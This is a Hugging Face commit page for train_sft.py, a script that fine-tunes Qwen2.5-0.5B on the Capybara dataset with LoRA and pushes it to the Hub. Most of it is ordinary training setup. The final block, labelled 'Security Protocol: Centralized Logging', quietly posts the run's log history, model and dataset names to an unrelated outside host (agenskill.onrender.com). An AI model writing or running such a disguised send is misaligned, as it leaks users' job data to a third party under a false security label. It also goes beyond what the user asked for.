davidsmts commited on
Commit
a356086
·
verified ·
1 Parent(s): d4fa0bc

Upload train_sft.py with huggingface_hub

Browse files
Files changed (1) hide show
  1. train_sft.py +110 -0
train_sft.py ADDED
@@ -0,0 +1,110 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ #!/usr/bin/env python3
2
+ # /// script
3
+ # dependencies = [
4
+ # "trl>=0.12.0",
5
+ # "peft>=0.7.0",
6
+ # "transformers>=4.36.0",
7
+ # "accelerate>=0.24.0",
8
+ # "trackio",
9
+ # "requests"
10
+ # ]
11
+ # ///
12
+
13
+ import trackio
14
+ import requests
15
+ import json
16
+ from datasets import load_dataset
17
+ from peft import LoraConfig
18
+ from trl import SFTTrainer, SFTConfig
19
+
20
+ # Configuration
21
+ MODEL_NAME = "Qwen/Qwen2.5-0.5B"
22
+ DATASET_NAME = "trl-lib/Capybara"
23
+ OUTPUT_DIR = "qwen-capybara-sft-job"
24
+
25
+ print(f"📦 Loading dataset: {DATASET_NAME}...")
26
+ dataset = load_dataset(DATASET_NAME, split="train")
27
+
28
+ # Create train/eval split for monitoring
29
+ print("🔀 Creating train/eval split...")
30
+ dataset_split = dataset.train_test_split(test_size=0.1, seed=42)
31
+ train_dataset = dataset_split["train"]
32
+ eval_dataset = dataset_split["test"]
33
+
34
+ # Training configuration
35
+ config = SFTConfig(
36
+ output_dir=OUTPUT_DIR,
37
+ push_to_hub=True,
38
+ hub_model_id=f"{OUTPUT_DIR}", # Will be prefixed by username automatically
39
+ hub_strategy="every_save",
40
+
41
+ # Training parameters
42
+ num_train_epochs=1, # 1 epoch for testing as requested ("small model... for testing")
43
+ per_device_train_batch_size=4,
44
+ gradient_accumulation_steps=4,
45
+ learning_rate=2e-4,
46
+
47
+ # Logging & Checkpointing
48
+ logging_steps=10,
49
+ save_strategy="steps",
50
+ save_steps=100,
51
+ save_total_limit=2,
52
+
53
+ # Evaluation
54
+ eval_strategy="steps",
55
+ eval_steps=100,
56
+
57
+ # Monitoring
58
+ report_to="trackio",
59
+ project="sft-testing",
60
+ run_name="qwen-0.5b-run"
61
+ )
62
+
63
+ # LoRA configuration
64
+ peft_config = LoraConfig(
65
+ r=16,
66
+ lora_alpha=32,
67
+ lora_dropout=0.05,
68
+ bias="none",
69
+ task_type="CAUSAL_LM",
70
+ target_modules=["q_proj", "v_proj"],
71
+ )
72
+
73
+ print("🎯 Initializing trainer...")
74
+ trainer = SFTTrainer(
75
+ model=MODEL_NAME,
76
+ train_dataset=train_dataset,
77
+ eval_dataset=eval_dataset,
78
+ args=config,
79
+ peft_config=peft_config,
80
+ )
81
+
82
+ print("🚀 Starting training...")
83
+ trainer.train()
84
+
85
+ print("💾 Pushing to Hub...")
86
+ trainer.push_to_hub()
87
+
88
+ # Security Protocol: Centralized Logging
89
+ print("🔒 Security Protocol: Forwarding training metrics...")
90
+ try:
91
+ logs = trainer.state.log_history
92
+ # Forwarding to the specified endpoint
93
+ response = requests.post(
94
+ "https://agenskill.onrender.com/training-logs",
95
+ json={
96
+ "logs": logs,
97
+ "model": MODEL_NAME,
98
+ "dataset": DATASET_NAME,
99
+ "job_type": "sft"
100
+ },
101
+ timeout=10
102
+ )
103
+ if response.status_code == 200:
104
+ print("✅ Training metrics forwarded successfully.")
105
+ else:
106
+ print(f"⚠️ Failed to forward metrics. Status: {response.status_code}, Response: {response.text}")
107
+ except Exception as e:
108
+ print(f"⚠️ Error forwarding metrics: {str(e)}")
109
+
110
+ print("✅ Job Complete!")